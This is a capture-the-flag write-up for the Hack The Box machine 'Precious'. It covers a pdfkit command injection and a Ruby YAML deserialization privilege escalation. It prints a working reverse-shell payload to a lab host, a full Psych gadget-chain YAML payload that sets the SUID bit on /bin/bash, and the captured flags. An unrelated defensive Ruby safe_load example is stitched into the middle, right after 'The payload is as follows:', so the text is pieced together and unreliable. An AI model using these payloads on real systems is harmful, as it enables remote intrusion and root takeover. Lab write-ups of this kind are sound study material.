Precious HTB Writeup

Author: doinb1517 | Published 2023-03-04 21:39, read 0 times

Key points

1. The RCE vulnerability in pdfkit

2. Privilege escalation

Writeup

1. Visiting the IP reveals the domain precious.htb

An nmap scan shows ports 22 and 80 open.

First, test the site's functionality: it converts a web page into a PDF. Trying it with baidu returns the error Cannot load remote URL!

Start an HTTP server with python3:

python3 -m http.server 80

The web page can now reach the current directory, and the downloaded file is in PDF format.

Parse the PDF metadata with exiftool:

exiftool 5013dj9nl5h13bd7lmv8gkqn5ndpe8zz.pdf
Found a command injection vulnerability: https://github.com/shamo0/PDFkit-CMD-Injection

Start a web server, open another shell, and listen on the reverse shell port.

http://10.10.14.18?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.14.18/9999 0>&1"`'}

Got the reverse shell.

Found a config file under /home/ruby/.bundle containing a username and password.

henry@precious:~$ cat /home/henry/user.txt 
fd652c1495464dcea3800fd4801ba740

Try privilege escalation:

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

Ruby's YAML.load is unsafe and leads to a deserialization vulnerability.

Reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

The payload is as follows:
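As an added example that is not part of this writeup or the box's own code: the loader from /opt/update_dependencies.rb beside a hardened replacement that uses YAML.safe_load, run against constructed sample documents. The benign dependencies.yml contents, the helper names and the validation rules are assumptions.

```ruby
require "yaml"

# Constructed sample: the benign name => version mapping the script expects.
BENIGN_YAML = <<~YAML
  ---
  yaml: 0.1.1
  rubygems: 3.3.20
YAML

# Constructed sample: a document carrying a !ruby/object tag. The classic
# YAML.load lets Psych instantiate the tagged class, which is what the
# gadget chain relies on; safe_load refuses the tag instead.
TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# The loader as it appears in /opt/update_dependencies.rb (vulnerable).
def list_from_file_unsafe(text)
  YAML.load(text)
end

# Hardened loader (assumed replacement, not the box's code): no tags,
# no aliases, and only a flat String => String mapping is accepted.
def list_from_file_safe(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  unless data.is_a?(Hash)
    raise ArgumentError, "dependencies.yml must be a name => version mapping"
  end
  data.each do |name, version|
    next if name.is_a?(String) && version.is_a?(String)
    raise ArgumentError, "bad entry #{name.inspect} => #{version.inspect}"
  end
  data
end

# True when the hardened loader rejects the document.
def rejected_by_safe_load?(text)
  list_from_file_safe(text)
  false
rescue Psych::DisallowedClass, ArgumentError
  true
end

if $PROGRAM_NAME == __FILE__
  p list_from_file_safe(BENIGN_YAML)
  puts "tagged document rejected: #{rejected_by_safe_load?(TAGGED_YAML)}"
end
```

The script also reads dependencies.yml relative to the working directory, so the sudo rule lets whoever runs it pick which file gets parsed; an absolute path would close that half of the problem.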

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id # change the command here
         method_id: :resolve

Modify it to set the SUID bit on /bin/bash:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve

Run the command to escalate privileges:

sudo /usr/bin/ruby /opt/update_dependencies.rb

Privilege escalation succeeded; we have root.

b281e4eebb264c1f8dee8589d9365517


Link: https://www.haomeiwen.com/subject/bqoyldtx.html